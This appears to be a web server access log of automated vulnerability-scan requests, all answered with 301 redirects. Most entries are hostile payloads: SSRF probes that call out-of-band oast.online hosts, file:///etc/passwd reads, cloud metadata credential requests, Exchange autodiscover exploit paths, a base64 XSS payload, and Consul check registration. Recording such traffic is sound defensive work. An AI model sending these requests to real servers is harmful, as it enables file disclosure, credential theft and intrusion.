March 9, 2025, 11:45 p.m. —
GET
/archive/download?file=file:///etc/passwd
→ 301
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/15.0.0 Version/17.3.…
March 9, 2025, 11:45 p.m. —
GET
/?url=http://0177.0.0.1/server-status
→ 301
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
March 9, 2025, 11:45 p.m. —
GET
/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent?section=TryToAvoidGetCacheItem111&baseUrl=http://cv7074f52kkfhfvb2300p6n5a38zk7obb.oast.online/
→ 301
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0
March 9, 2025, 11:45 p.m. —
GET
/
→ 301
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
March 9, 2025, 11:45 p.m. —
GET
/umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=http://cv7074f52kkfhfvb2300t37zxhqie78cc.oast.online
→ 301
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0
March 9, 2025, 11:34 p.m. —
GET
/wp-json/oembed/1.0/proxy?url=http://cv7074f52kkfhfvb2300ifn6wwcs11mjq.oast.online
→ 301
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
March 9, 2025, 11:34 p.m. —
GET
/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com
→ 301
User-Agent: Mozilla/5.0 (SS; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0
March 9, 2025, 11:34 p.m. —
GET
/pictureproxy.php?url=http://cv7074f52kkfhfvb23008kw1ib3o1m8bd.oast.online
→ 301
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
March 9, 2025, 11:34 p.m. —
GET
/Items/RemoteSearch/Image?ImageUrl=https://oast.me/&ProviderName=TheMovieDB
→ 301
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15
March 9, 2025, 11:34 p.m. —
GET
/wp-json/oembed/1.0/proxy
→ 301
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
March 9, 2025, 11:34 p.m. —
GET
/grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1
→ 301
User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
March 9, 2025, 11:34 p.m. —
GET
/ueditor/jsp/controller.jsp?action=catchimage&source[]=http://127.0.0.1:248733/?1.png
→ 301
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
March 9, 2025, 11:34 p.m. —
GET
/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com
→ 301
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
March 9, 2025, 11:34 p.m. —
GET
/api/cors/http:%2f%2fnextchat.cv7074f52kkfhfvb2300b9b4fmkuxzysq.oast.online%23
→ 301
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
March 9, 2025, 11:34 p.m. —
GET
/filex/read-raw?url=http://oast.me&cut=1
→ 301
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.9.17
March 9, 2025, 11:34 p.m. —
GET
/Images/Remote?imageUrl=https://oast.me/
→ 301
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0
March 9, 2025, 11:33 p.m. —
GET
/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1
→ 301
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36
March 9, 2025, 11:33 p.m. —
GET
/pictureproxy.php?url=file:///etc/passwd
→ 301
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
March 9, 2025, 11:33 p.m. —
GET
/_next/image?w=16&q=10&url=https://cv7074f52kkfhfvb2300kjqgg4p46h4c5.oast.online
→ 301
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0
March 9, 2025, 11:33 p.m. —
PUT
/v1/agent/check/deregister/2u62BiximUiEr05LLqVbOgQgmsN
→ 301
User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
March 9, 2025, 11:33 p.m. —
GET
/ueditor/php/controller.php?action=catchimage&source[]=http://127.0.0.1:219398/?1.png
→ 301
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
March 9, 2025, 11:33 p.m. —
GET
/api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23
→ 301
User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
March 9, 2025, 11:33 p.m. —
GET
/
→ 301
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
March 9, 2025, 11:33 p.m. —
GET
/MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com
→ 301
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
March 9, 2025, 11:33 p.m. —
PUT
/v1/agent/check/register
→ 301
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
March 9, 2025, 11:33 p.m. —
GET
/_next/image?w=16&q=10&url=http://cv7074f52kkfhfvb23008kus6ssbquamu.oast.online
→ 301
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edg…
March 9, 2025, 11:33 p.m. —
GET
/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com
→ 301
User-Agent: Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
March 9, 2025, 11:33 p.m. —
GET
http://139.59.53.236/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance
→ 301
User-Agent: -
March 9, 2025, 11:32 p.m. —
GET
http://139.59.53.236/metadata/v1.json
→ 301
User-Agent: -
March 9, 2025, 11:32 p.m. —
GET
/login.php
→ 301
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36